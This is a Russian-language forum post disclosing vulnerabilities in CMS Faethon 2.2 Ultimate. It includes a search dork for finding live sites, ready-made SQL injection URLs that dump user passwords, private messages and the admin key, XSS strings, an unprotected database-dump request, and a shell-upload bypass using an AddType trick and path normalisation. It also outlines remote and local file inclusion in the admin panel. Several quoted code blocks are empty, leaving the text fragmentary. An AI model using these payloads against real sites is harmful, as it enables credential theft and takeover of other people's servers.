![]() |
CMS Faethon 2.2 Ultimate
http://i028.radikal.ru/0904/03/fc3d291470b0.png
скачать: http://cmsfaethon.org/downloads/#22ultimate dork: "Powered by CMS Faethon" очень интересная cms) никаких проверок, никаких фильтраций, и подобного.. в общем, баги присутствует почти в каждом файле) BlindSQLinj vote.php: /vote.php?alt=' blindSQLinjection--+ - только один раз с одного ip PHP код:
/info.php?item=' union select concat_ws(0x3a,username,password,string),2 from <PREFIX>_users where id=1--+ /info.php?item=' union select concat_ws(0x3a,from_user,to_user,subject,text,date _send,date_read),2 from n07_users_pms limit x,x--+ - читаем ПМ :) /info.php?item=' union select adminkey,2 from n07_config where cfg=1--+ - читаем админ_ключ PHP код:
Формирование паролей: PHP код:
/author.php?id=' union select 1,concat_ws(0x3a,username,password,string) from n07_users where id=1--+ /author.php?name=' union select 1,concat_ws(0x3a,username,password,string) from n07_users where id=1--+ PHP код:
/?SetLang[]=eng /gallery/image.php?id[]=175 /articles.php?from_date[]=1-2-3&to_date=1-2-3 XSS:: /article.php?item=">XSS<a href= XSS в ПМ-сообщениях:: можно отправить админу пм ) /user_pms.php?action=new_msg Код:
Komu: ..дамп - /admin/acp/backup/dump.php $_POST['backup'] = 4; //Download $_POST['akce'] = SaveDump ; ^^ надо передать post запросом |
Админка.
[admin\files-manager\action.php 31 line] Быстренько просмотрев код... Блеклисты не рулят =)) PHP код:
Код:
AddType application/x-httpd-php .jpg |
Также помним, что PHP проводит нормализацию пути:
shell.php/ |
Продолжим (:
http://localhost/22_ultimate/admin/?cmd=gallery.images [/admin/gallery/upload.php 50 line] Мега защита =) PHP код:
Код:
Array ( [0] => shell [1] => jpg [2] => php ) RFI Рассмотрим admin\acp\extensions\index.php Существует вот такой вот код. PHP код:
PHP код:
index.php?op=install&ext=[path] $chksum - ето у нас путь в md5. Скрипт не может сделать sql_query, так как нет такого класа. Следовательно sql_fetch_row не выполнится тоже, а $row_array[0] не будет ровно $chksum. Имеем include($path); LFI /admin/acp/restore/restore.php PHP код:
|
| Время: 18:29 |